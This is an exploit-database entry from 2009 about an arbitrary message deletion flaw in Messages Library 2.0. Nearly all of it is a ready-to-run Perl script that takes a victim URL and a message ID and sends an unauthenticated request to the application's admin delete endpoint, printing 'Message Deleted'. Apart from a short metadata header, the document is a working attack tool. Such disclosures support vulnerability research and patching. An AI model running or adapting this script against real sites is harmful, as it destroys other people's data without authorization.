Messages Library 2.0 Arbitrary Delete Message Vulnerability

2009-07-01T00:00:00
ID 1337DAY-ID-5446
Type zdt
Reporter Stack
Modified 2009-07-01T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
Messages Library 2.0 Arbitrary Delete Message Vulnerability
===========================================================


#!/usr/bin/perl -w
#  Messages Library 2.0 <=  Arbitrary Delete Message
########################################
#[*] Founded &  Exploited by : Stack
########################################
print "\t\t############################################################\n\n";
print "\t\t#   Messages Library 2.0 <=  Arbitrary Delete Message      #\n\n";
print "\t\t#                          by Stack                        #\n\n";
print "\t\t############################################################\n\n";
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
print "\n[!] ContactID : ";
chomp(my $id=<STDIN>);
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "/admin/sms.php?Action=Delete&ID=".$id."";
$res = $b->request(HTTP::Request->new(POST=>$host));
        print "\n[+] Message Deleted \n";




#  0day.today [2018-03-01]  #